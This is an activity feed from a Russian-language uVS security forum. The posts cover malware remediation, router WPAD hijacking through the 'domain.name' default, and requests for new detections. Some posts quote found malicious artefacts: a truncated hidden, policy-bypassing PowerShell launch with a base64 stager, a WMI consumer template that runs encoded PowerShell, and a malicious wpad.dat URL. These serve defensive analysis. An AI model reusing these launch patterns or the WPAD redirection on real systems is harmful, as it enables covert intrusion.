Перейти к содержанию

Вся активность

This stream auto-updates     

  1. Yesterday
  2. Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
  3. Последняя неделя
  4. Спасибо, как раз появился новый случай. DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1
  5. --------------------------------------------------------- 4.11.9 --------------------------------------------------------- o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации. Только для Windows 8.1/Windows Server 2012 R2 и старше. o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла. o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.
  6. https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...
  7. а вот это странно, надо будет почитать может еще что-то отключать надо
  8. В моем случае я кажется нашел этот - DhcpDomain папаметр: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{64846981-4885-4d8b-af0b-1097a90e00f6} EnableDHCP REG_DWORD 0x1 Domain REG_SZ NameServer REG_SZ DhcpServer REG_SZ 192.168.2.1 Lease REG_DWORD 0x3f480 LeaseObtainedTime REG_DWORD 0x6145e5fe T1 REG_DWORD 0x6147e03e T2 REG_DWORD 0x61495bee LeaseTerminatesTime REG_DWORD 0x6149da7e AddressType REG_DWORD 0x0 IsServerNapAware REG_DWORD 0x0 DhcpConnForceBroadcastFlag REG_DWORD 0x0 DhcpNetworkHint REG_SZ 8616070797 RegistrationEnabled REG_DWORD 0x1 RegisterAdapterName REG_DWORD 0x0 IPAddress REG_MULTI_SZ SubnetMask REG_MULTI_SZ DefaultGateway REG_MULTI_SZ DefaultGatewayMetric REG_MULTI_SZ DhcpIPAddress REG_SZ 192.168.2.103 DhcpSubnetMask REG_SZ 255.255.255.0 DhcpDomain REG_SZ home DhcpNameServer REG_SZ 192.168.2.1 DhcpDefaultGateway REG_MULTI_SZ 192.168.2.1 DhcpSubnetMaskOpt REG_MULTI_SZ 255.255.255.0 DhcpInterfaceOptions REG_BINARY FC00000000000000000000000000000043880400790000000000000000000000000000004388040077000000000000000000000000000000438804002F000000000000000000000000000000438804002E000000000000000000000000000000438804002C000000000000000000000000000000438804002B0000000000000000000000000000004388040021000000000000000000000000000000438804001F000000000000000000000000000000438804000F000000000000000400000000000000C339F780686F6D6506000000000000000400000000000000C339F780C0A8020103000000000000000400000000000000C339F780C0A8020101000000000000000400000000000000C339F780FFFFFF0033000000000000000400000000000000C339F7800003F48036000000000000000400000000000000C339F780C0A8020135000000000000000100000000000000C339F78005000000 DhcpGatewayHardware REG_BINARY C0A8020106000000B8D94D42ED7E DhcpGatewayHardwareCount REG_DWORD 0x1 также я могу его пинговать. >ping -a home Pinging home.home [192.168.2.1] with 32 bytes of data: Reply from 192.168.2.1: bytes=32 time=1ms TTL=64 Reply from 192.168.2.1: bytes=32 time=1ms TTL=64
  9. Мне ЛК, также написали: Но пользователь сказал, что не было галочки на "Автоматически определять настройки".
  10. Earlier
  11. Например есть пакет с драйверами ( сотни... тысячи драйверов ) Предполагается использовать этот пакет для обновления системных драйверов, или WIM Часть драйверов подписана, часть нет... Хотелось бы, чтобы uVS ( по команде в меню: Файл ) - создала из этих драйверов пакет установки\обновления. Копию только из подписанных ( прошедших проверку ( и проверенных по SHA ) драйверов. Копию по типу программы: " Double Driver" http://soft.oszone.net/program/5936/Double_Driver/ + Возможность создать копию системных драйверов, системы - но, опять таки... копировать только подписанные драйвера и те, что есть в базе SHA.
  12. гляну, но это дыра с wpad все равно закрывается лишь отключением автонастройки прокси в браузере, больше никак.
  13. В качестве решения, необходимо зайти на роутер и поменять домена имя с domain.name на my.router (в качестве примера или другое несуществующее имя домена). Но было бы не плохо в uVS логах идентифицировать такие случае.
  14. Приветствую, Мне тут попалась интересная тема, которая может затронуть тысячи роутеров. https://forum.kasperskyclub.ru/topic/84677-postojanno-vylazit-uvedomlenie-chto-ostanovlen-perehod-na-vredonosnuju-ssylku/page/3/ Как оказалось у многих роутеров указавается доменое имя по умолчанию domain.name Получается, что это доменное имя реальное, и оно содержит вренодоносные настройки которые Windows 7/10 автоматически подхвытывают, http://185.38.111.1/wpad.dat или http://wpad.domain.name/wpad.dat Можно ли добавить в uVS сетевое доменное имя получаемое от dhcp клиента?
  15. Приветствую Дмитрий, Похоже вы были правы из-за этого файла vboxnetflt.exe и возникали проблемы. После его удаление антивирус Kaspersky не ругается.
  16. Ее можно установить дополнительно к антивирусу или она не требует установки?
  17. Дмитрий, Похоже я ошибся и не внимательно прочитал статью Sophos: Легитимная запись: "SCM Event Log Consumer" (type: NTEventLogEventConsumer) + "SCM Event Log Filter" Вредоносная запись : "SCM Events Log Consumer" (type: CommandLineEventConsumer) + "SCM Events Log Filter" Прошу прощения, что побеспокойл.
  18. Спасибо за ответ, похоже статья антивируса Sophos меня ввела в заблуждение. Запрошу проверить пользователя указанные файлы и запрошу у него лог в безопасном режиме.
  19. приветствую, в логе он стандартный ничего вредоносного в нем нет, причина точно не в нем. что видит касперский хз, может нащупал внедренный поток в один из файлов, например в vboxnetflt.exe, на который ругается uVS, а может это особенность его работы, я с ним не работал, но лог вообще плохой, масса защищенных файлов, какой-то левый драйвер в safe mode прописан, чистить и чистить его.
  20. Приветствую Дмитрий, Могли бы уточнить, если в логе он вредоносный, если нет этого шаблона CommandLineTemplate? Если не вредоносный, то не понятно, что в логе вредоносное? не понятно на что антивирус Касперского видит как угрозу - Trojan.Win32.SEPEH.gen?
  21. В данном случае его нет, если бы он был, то он был бы в окне информации SCM Event Log Consumer-а, а тут он дефолтный без модификаций.
  22. Приветствую, Тема:троян Trojan.Win32.SEPEH.gen Логи: https://1drv.ms/u/s!Aguwh-yruJSWmDiEufzPnleDlxAb?e=JNftXj Могли бы пожалуйста уточнить, если возможно uVS получить шаблон CommandLineTemplate? WMI:subscription\NTEventLogEventConsumer->SCM Event Log Consumer::[CommandLineTemplate => powershell.exe -NoP -NonI -W Hidden -E <Encoded Base64 String>] Похоже, была найдена следующая угроза, которую другие утилиты не видят. Remediation Script for WannaMine Infection Хотелось иметь более полное описание угрозы в логе uVS.
  23. А дельная утилита. Прогнал на журнале, где взлом был у юзера, всё по полочкам разложено.
  24. Новый инструмент Chainsaw помогает командам IR анализировать журналы событий Windows Chainsaw.webp F-Secure заявляет, что Chainsaw специально разработан для быстрого анализа журналов событий в средах, где решение для обнаружения и реагирования (EDR) отсутствовало во время взлома. В таких случаях специалисты, реагирующие на инциденты могут использовать функции поиска Chainsaw для извлечения из журналов Windows информации, относящейся к вредоносной деятельности. Пользователи могут использовать этот инструмент для следующих действий: Поиск в журналах событий по идентификатору события, ключевому слову и шаблонам регулярных выражений Извлечение и анализ предупреждений Защитника Windows, F-Secure, Sophos и Kaspersky AV. Обнаружение очистки журналов ключевых событий или остановки службы журнала событий Обнаружение пользователей, которые создаются или добавляются в конфиденциальные группы пользователей Брутфорс локальных учетных записей пользователей Логины RDP, сетевые логины и т. д. https://www.bleepingcomputer.com/news/security/new-chainsaw-tool-helps-ir-teams-analyze-windows-event-logs/ https://www.bleepingcomputer.com/news/security/new-chainsaw-tool-helps-ir-teams-analyze-windows-event-logs/
  25. Приветствую, Я тут не давно встретил встретил интересную тему, когда можно закрепить программы на панели задач, что даже если их удалить вручную, они будут восстанавливаться после каждой перезагрузке. Может стоит добавить детект следующего файла, на случай если указаные в нем настройки не по-умолчанию ? %userprofile%\AppData\Local\Microsoft\Windows\Shell\LayoutModification.xml Т.е. есть вероятность, добавления вредоносной программы (adware) или веб-ярлыка, которая будет восстанавливаться после каждой загрузке.
  26. GPU 15%, CPU загрзка 60% в пересчете на 1 ядро, т.е. для 4-х поточного процессора это те же 15%.
  1. Load more activity
×